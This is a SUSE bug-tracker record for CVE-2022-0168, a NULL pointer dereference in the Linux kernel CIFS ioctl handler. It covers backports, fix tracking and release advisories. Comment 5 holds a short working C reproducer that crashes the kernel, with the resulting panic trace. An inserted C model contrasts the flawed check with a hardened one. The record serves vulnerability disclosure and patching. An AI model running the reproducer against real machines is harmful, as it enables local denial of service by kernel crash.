Bug 1197472 - (CVE-2022-0168) VUL-1: CVE-2022-0168: kernel-source,kernel-source-rt,kernel-source-azure: smb2_ioctl_query_info NULL Pointer Dereference
Status: NEW
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium, Severity: Normal
Assigned To: Security Team bot
https://smash.suse.de/issue/327008/
CVSSv3.1:SUSE:CVE-2022-0168:4.4:(AV:L...

Reported: 2022-03-24 10:57 UTC by Thomas Leroy
Modified: 2022-07-21 20:36 UTC
Found By: Security Response Team

Description Thomas Leroy 2022-03-24 10:57:31 UTC
rh#2037386

In function `smb2_ioctl_query_info`, it incorrectly verifies the return from the `memdup_user` function. `qi.output_buffer_length` is grabbed from copy_from_user, which is a user-controlled value. If qi.output_buffer_length is equal to zero, the `memdup_user` function returns `0x10`, which is not a valid ptr but can pass the check. Later this evil `buffer` is passed to function `SMB2_set_info_init` if qi.flags is equal to `PASSTHRU_SET_INFO`. In function `SMB2_set_info_init`, there is a straight memcpy in which `*data` is the previous evil buffer and `*size` is 8.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2037386
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0168
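
Added example (not part of the original report and not kernel or SUSE code): a userspace C model of the check described above, showing why the `0x10` pointer returned for a zero length is not caught by an `IS_ERR()` test, next to a length check that rejects it. The `model_*` helpers, `check_flawed` and `check_hardened` are hypothetical names; the macro values mirror the kernel's `ZERO_SIZE_PTR`, `ZERO_OR_NULL_PTR`, `MAX_ERRNO` and `IS_ERR`; the hardened variant is one possible check, not the upstream patch.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Userspace models of kernel definitions (include/linux/slab.h, err.h). */
#define ZERO_SIZE_PTR       ((void *)16)   /* what kmalloc(0) returns: 0x10 */
#define ZERO_OR_NULL_PTR(p) ((uintptr_t)(p) <= (uintptr_t)ZERO_SIZE_PTR)
#define MAX_ERRNO           4095
#define IS_ERR(p)           ((uintptr_t)(p) >= (uintptr_t)(-MAX_ERRNO))
#define ERR_PTR(e)          ((void *)(intptr_t)(e))

#define SET_INFO_SIZE 8   /* the `*size` the description says is memcpy'd */

enum verdict { REJECTED, PASSED_VALID_BUFFER, PASSED_BOGUS_POINTER };

/* Constructed sample standing in for the caller-supplied buffer. */
static const unsigned char sample_user_data[SET_INFO_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8};

/* kmalloc(0) does not fail and does not return NULL: it returns ZERO_SIZE_PTR. */
static void *model_kmalloc(size_t len)
{
    return len ? malloc(len) : ZERO_SIZE_PTR;
}

/* kfree() ignores both NULL and ZERO_SIZE_PTR. */
static void model_kfree(void *p)
{
    if (!ZERO_OR_NULL_PTR(p))
        free(p);
}

/* memdup_user(): allocate, copy, return ERR_PTR() only on failure. */
static void *model_memdup_user(const void *src, size_t len)
{
    void *p = model_kmalloc(len);

    if (!p)
        return ERR_PTR(-ENOMEM);
    if (len)
        memcpy(p, src, len);
    return p;
}

/* Flawed pattern from the description: only IS_ERR() guards the buffer. */
static enum verdict check_flawed(const void *user_buf, uint32_t len)
{
    void *buffer = model_memdup_user(user_buf, len);
    enum verdict v;

    if (IS_ERR(buffer))
        return REJECTED;
    /* Observer's classification only; the flawed code has no such test
     * and would hand `buffer` straight to the 8-byte memcpy. */
    v = ZERO_OR_NULL_PTR(buffer) ? PASSED_BOGUS_POINTER : PASSED_VALID_BUFFER;
    model_kfree(buffer);
    return v;
}

/* Hardened pattern (assumption): validate the length before copying. */
static enum verdict check_hardened(const void *user_buf, uint32_t len)
{
    void *buffer;
    enum verdict v;

    if (len < SET_INFO_SIZE)
        return REJECTED;
    buffer = model_memdup_user(user_buf, len);
    if (IS_ERR(buffer))
        return REJECTED;
    v = ZERO_OR_NULL_PTR(buffer) ? PASSED_BOGUS_POINTER : PASSED_VALID_BUFFER;
    model_kfree(buffer);
    return v;
}

int main(void)
{
    printf("flawed,   len=0: %d\n", check_flawed(sample_user_data, 0));
    printf("flawed,   len=8: %d\n", check_flawed(sample_user_data, 8));
    printf("hardened, len=0: %d\n", check_hardened(sample_user_data, 0));
    printf("hardened, len=8: %d\n", check_hardened(sample_user_data, 8));
    return 0;
}
```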
Comment 1 Thomas Leroy 2022-03-24 11:01:20 UTC
No upstream fix yet.

This commit probably introduced the bug:
https://github.com/torvalds/linux/commit/cfaa1181097f6a1a6f4f6670ebc97848efda0883
(CIFS: Use memdup_user() rather than duplicating its implementation)

I think the kmalloc + copy_from_user prior to memdup_user use was safe.

If the commit mentioned above is the correct one that introduced the bug, we have the following branches affected:
- SLE15-SP3
- SLE15-SP4-GA
- cve/linux-5.3
- stable
Comment 2 Paulo Alcantara 2022-03-24 12:34:52 UTC
(In reply to Thomas Leroy from comment #0)
> rh#2037386
> 
> In function `smb2_ioctl_query_info`, it incorrectly verifies the return from
> the `memdup_user` function. `qi.output_buffer_length` is grabbed from
> copy_from_user, which is a user-controlled value. If qi.output_buffer_length
> is equal to zero, the `memdup_user` function returns `0x10`, which is not a
> valid ptr but can pass the check. Later this evil `buffer` is passed to
> function `SMB2_set_info_init` if qi.flags is equal to `PASSTHRU_SET_INFO`.
> In function `SMB2_set_info_init`, there is a straight memcpy in which `*data`
> is the previous evil buffer and `*size` is 8.
> 
> References:
> https://bugzilla.redhat.com/show_bug.cgi?id=2037386
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0168

Thanks for the report!  Yes, that is a very serious bug.

Since I could access the RH bug report, should I assume it is public and not embargoed, right?
Comment 3 Paulo Alcantara 2022-03-24 12:37:42 UTC
(In reply to Thomas Leroy from comment #1)
> No upstream fix yet.

There is a suggested change[1] to fix this issue.  If you could confirm it is public, then I can prepare a formal patch for that.

> This commit probably introduced the bug:
> https://github.com/torvalds/linux/commit/cfaa1181097f6a1a6f4f6670ebc97848efda0883
> (CIFS: Use memdup_user() rather than duplicating its implementation)

Yes.

> I think the kmalloc + copy_from_user prior to memdup_user use was safe.

Yes.

> If the commit mentioned above is the correct one that introduced the bug, we
> have the following branches affected:
> - SLE15-SP3
> - SLE15-SP4-GA
> - cve/linux-5.3
> - stable

[1] https://bugzilla.redhat.com/show_bug.cgi?id=2037386#c6
Comment 4 Thomas Leroy 2022-03-24 13:20:59 UTC
(In reply to Paulo Alcantara from comment #2)
> Since I could access the RH bug report, should I assume it is public and not
> embargoed, right?

Yes this is a public issue. Every bug we open coming from RH bugzilla is public ;)

> There is a suggested change[1] to fix this issue.  If you could confirm it
> is public, then I can prepare a formal patch for that.

The fact that there is still nothing upstream, even though we have a suggested fix, could mean that it is not very urgent for upstream...

Anyway, thanks for your efforts Paulo!
Comment 5 Paulo Alcantara 2022-03-24 17:03:00 UTC
(In reply to Thomas Leroy from comment #4)
> (In reply to Paulo Alcantara from comment #2)
> > Since I could access the RH bug report, should I assume it is public and not
> > embargoed, right?
> 
> Yes this is a public issue. Every bug we open coming from RH bugzilla is
> public ;)
> 
> > There is a suggested change[1] to fix this issue.  If you could confirm it
> > is public, then I can prepare a formal patch for that.
> 
> The fact that there is still nothing upstream, even though we have a
> suggested fix, could mean that it is not very urgent for upstream...
> 
> Anyway, thanks for your efforts Paulo!

Thanks Thomas!

I've got a small C reproducer for this issue:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

#define die(s) perror(s), exit(1)
#define QUERY_INFO 0xc018cf07

int main(int argc, char *argv[])
{
	int fd;

	if (argc < 2)
		exit(1);
	fd = open(argv[1], O_RDONLY);
	if (fd == -1)
		die("open");
	if (ioctl(fd, QUERY_INFO, (uint32_t[]) { 0, 0, 0, 4, 0, 0 }) == -1)
		die("ioctl");
	close(fd);
	return 0;
}

which indeed triggers the following NULL ptr dereference:

[..]
[  114.138620] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI                                                                                                                                                             
[  114.139310] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]                                                                                                                                                                                                         
[  114.139775] CPU: 2 PID: 995 Comm: a.out Not tainted 5.17.0-rc8 #1                                                                                                                                                                                                                          
[  114.140148] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-0-g2dd4b9b-rebuilt.opensuse.org 04/01/2014                                                                                                                                                                 
[  114.140818] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs]                                                                                                                                                                                                                             
[  114.141221] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24                                                                        
[  114.142348] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256                                                                                                                                                                                                                                    
[  114.142692] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d                                                                                                                                                                                                              
[  114.143119] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380                                                               
[  114.143544] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003                                                               
[  114.143983] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288                                                               
[  114.144424] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000                                                               
[  114.144852] FS:  00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000                                                                                                                                                                                                   
[  114.145338] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033                                                                               
[  114.145692] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0                                                               
[  114.146131] Call Trace:                                             
[  114.146291]  <TASK>                                                 
[  114.146432]  ? smb2_query_reparse_tag+0x890/0x890 [cifs]                                                                                    
[  114.146800]  ? cifs_mapchar+0x460/0x460 [cifs]                                                                                              
[  114.147121]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.147412]  ? cifs_strndup_to_utf16+0x15b/0x250 [cifs]                                                                                     
[  114.147775]  ? dentry_path_raw+0xa6/0xf0                                                                                                    
[  114.148024]  ? cifs_convert_path_to_utf16+0x198/0x220 [cifs]                                                                                
[  114.148413]  ? smb2_check_message+0x1080/0x1080 [cifs]                                                                                      
[  114.148766]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.149065]  cifs_ioctl+0x1577/0x3320 [cifs]                                                                                                
[  114.149371]  ? lock_downgrade+0x6f0/0x6f0                                                                                                   
[  114.149631]  ? cifs_readdir+0x2e60/0x2e60 [cifs]                                                                                            
[  114.149956]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.150250]  ? __rseq_handle_notify_resume+0x80b/0xbe0                                                                                      
[  114.150562]  ? __up_read+0x192/0x710                                
[  114.150791]  ? __ia32_sys_rseq+0xf0/0xf0                                                                                                    
[  114.151025]  ? __x64_sys_openat+0x11f/0x1d0                                                                                                 
[  114.151296]  __x64_sys_ioctl+0x127/0x190                                                                                                    
[  114.151549]  do_syscall_64+0x3b/0x90                                
[  114.151768]  entry_SYSCALL_64_after_hwframe+0x44/0xae                                                                                       
[  114.152079] RIP: 0033:0x7f7aead043df                                
[  114.152306] Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 10 00 00 00 48 89 44 24 08 48 8d 44 24 20 48 89 44 24 10 b8 10 00 00 00 0f 05 <41> 89 c0 3d 00 f0 ff ff 77 1f 48 8b 44 24 18 64 48 2b 04 25 28 00
[  114.153431] RSP: 002b:00007ffc2e0c1f80 EFLAGS: 00000246 ORIG_RAX: 0000000000000010                                                                                                                                                                                                         
[  114.153890] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f7aead043df                                                               
[  114.154315] RDX: 00007ffc2e0c1ff0 RSI: 00000000c018cf07 RDI: 0000000000000003                                                               
[  114.154747] RBP: 00007ffc2e0c2010 R08: 00007f7aeae03db0 R09: 00007f7aeae24c4e                                                               
[  114.155192] R10: 00007f7aeabf7d40 R11: 0000000000000246 R12: 00007ffc2e0c2128                                                               
[  114.155642] R13: 0000000000401176 R14: 0000000000403df8 R15: 00007f7aeae57000                                                               
[  114.156071]  </TASK>                                                
[  114.156218] Modules linked in: cifs cifs_arc4 cifs_md4 bpf_preload                                                                          
[  114.156608] ---[ end trace 0000000000000000 ]---                                                                                            
[  114.156898] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs]                                                                              
[  114.157792] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24
[  114.159293] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256                                                                                     
[  114.159641] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d                                                               
[  114.160093] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380                                                               
[  114.160699] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003                                                               
[  114.161196] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288
[  114.161823] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000
[  114.162274] FS:  00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000
[  114.162853] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  114.163218] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0
[  114.163691] Kernel panic - not syncing: Fatal exception
[  114.164087] Kernel Offset: disabled
[  114.164316] ---[ end Kernel panic - not syncing: Fatal exception ]---


I'll send a patch upstream for this along with a memory leak fix I've just found while looking into that code.
Comment 9 Petr Mladek 2022-05-06 11:48:04 UTC
This bug seems to approach a good date for CVE SLA fulfillment [1].
What is its status, please?
 
[1] https://confluence.suse.com/display/KSS/Kernel+Security+Sentinel
Comment 11 Paulo Alcantara 2022-05-06 13:45:33 UTC
(In reply to Petr Mladek from comment #9)
> This bug seems to approach a good date for CVE SLA fulfillment [1].
> What is its status, please?
>  
> [1] https://confluence.suse.com/display/KSS/Kernel+Security+Sentinel

I need to confirm whether CVE-2022-0168 is the correct one, then I'll backport the patches to the affected SLES branches.
Comment 12 Marcus Meissner 2022-05-06 15:48:26 UTC
The CVE was likely assigned by Red Hat and is used in their bugzilla, so it can be used here too.
Comment 13 Paulo Alcantara 2022-05-06 15:51:33 UTC
(In reply to Marcus Meissner from comment #12)
> The CVE was likely assigned by Red Hat and is used in their bugzilla, so it
> can be used here too.

Thx - will work on the backports.
Comment 14 Paulo Alcantara 2022-05-06 17:32:52 UTC
Pushed for-next branches with those commits backported:

  origin/users/palcantara/cve/linux-5.3/for-next
  origin/users/palcantara/SLE15-SP4-GA/for-next

origin/stable already has them.
Comment 16 Paulo Alcantara 2022-05-11 21:22:05 UTC
Fixes have been backported.  Reassigning to security team for closing it.
Comment 25 Swamp Workflow Management 2022-06-14 22:31:50 UTC
SUSE-SU-2022:2079-1: An update that solves 15 vulnerabilities, contains two features and has 36 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1152472,1152489,1153274,1154353,1156395,1158266,1167773,1176447,1178134,1180100,1183405,1188885,1195612,1195651,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198534,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200019,1200045,1200046,1200192,1200216
CVE References: CVE-2019-19377,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1972,CVE-2022-20008,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-24448,CVE-2022-30594
JIRA References: SLE-13521,SLE-16387
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.59.1, kernel-source-azure-5.3.18-150300.38.59.1, kernel-syms-azure-5.3.18-150300.38.59.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.59.1, kernel-source-azure-5.3.18-150300.38.59.1, kernel-syms-azure-5.3.18-150300.38.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Swamp Workflow Management 2022-06-14 22:36:46 UTC
SUSE-SU-2022:2078-1: An update that solves 14 vulnerabilities, contains two features and has 32 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1153274,1154353,1156395,1158266,1167773,1176447,1178134,1180100,1183405,1188885,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200019,1200045,1200046,1200192,1200216
CVE References: CVE-2019-19377,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1972,CVE-2022-20008,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-30594
JIRA References: SLE-13521,SLE-16387
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.71.1, kernel-preempt-5.3.18-150300.59.71.2
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.71.1, kernel-64kb-5.3.18-150300.59.71.2, kernel-debug-5.3.18-150300.59.71.2, kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2, kernel-docs-5.3.18-150300.59.71.2, kernel-kvmsmall-5.3.18-150300.59.71.2, kernel-obs-build-5.3.18-150300.59.71.2, kernel-obs-qa-5.3.18-150300.59.71.1, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-syms-5.3.18-150300.59.71.1, kernel-zfcpdump-5.3.18-150300.59.71.2
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-preempt-5.3.18-150300.59.71.2
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-livepatch-SLE15-SP3_Update_19-1-150300.7.3.2
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.71.2, kernel-obs-build-5.3.18-150300.59.71.2, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-syms-5.3.18-150300.59.71.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.71.2, kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-zfcpdump-5.3.18-150300.59.71.2
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2

Comment 27 Swamp Workflow Management 2022-06-16 19:27:52 UTC
SUSE-SU-2022:2104-1: An update that solves 23 vulnerabilities, contains one feature and has 19 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1158266,1177282,1191647,1195651,1195926,1196114,1196367,1196426,1196433,1196514,1196570,1196942,1197157,1197343,1197472,1197656,1197660,1197895,1198330,1198400,1198484,1198516,1198577,1198660,1198687,1198778,1198825,1199012,1199063,1199314,1199505,1199507,1199605,1199650,1199918,1200015,1200143,1200144,1200249
CVE References: CVE-2019-19377,CVE-2020-26541,CVE-2021-20321,CVE-2021-33061,CVE-2022-0168,CVE-2022-1011,CVE-2022-1158,CVE-2022-1184,CVE-2022-1353,CVE-2022-1516,CVE-2022-1652,CVE-2022-1729,CVE-2022-1734,CVE-2022-1966,CVE-2022-1974,CVE-2022-1975,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-28893,CVE-2022-30594
JIRA References: SLE-18234
Sources used:
SUSE Manager Server 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Manager Retail Branch Server 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Manager Proxy 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Module for Live Patching 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-livepatch-SLE15-SP2_Update_27-1-150200.5.3.1
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise High Availability 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1
SUSE Enterprise Storage 7 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1

Comment 29 Swamp Workflow Management 2022-06-24 16:22:46 UTC
SUSE-SU-2022:2177-1: An update that solves 20 vulnerabilities, contains three features and has 39 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1153274,1154353,1156395,1158266,1167773,1176447,1177282,1178134,1180100,1183405,1188885,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199365,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200015,1200019,1200045,1200046,1200143,1200144,1200192,1200206,1200207,1200216,1200249,1200259,1200263,1200529,1200549,1200604
CVE References: CVE-2019-19377,CVE-2020-26541,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1966,CVE-2022-1972,CVE-2022-1974,CVE-2022-1975,CVE-2022-20008,CVE-2022-20141,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-30594,CVE-2022-32250
JIRA References: SLE-13521,SLE-16387,SLE-8371
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.93.1, kernel-rt_debug-5.3.18-150300.93.1, kernel-source-rt-5.3.18-150300.93.1, kernel-syms-rt-5.3.18-150300.93.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.93.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.93.1
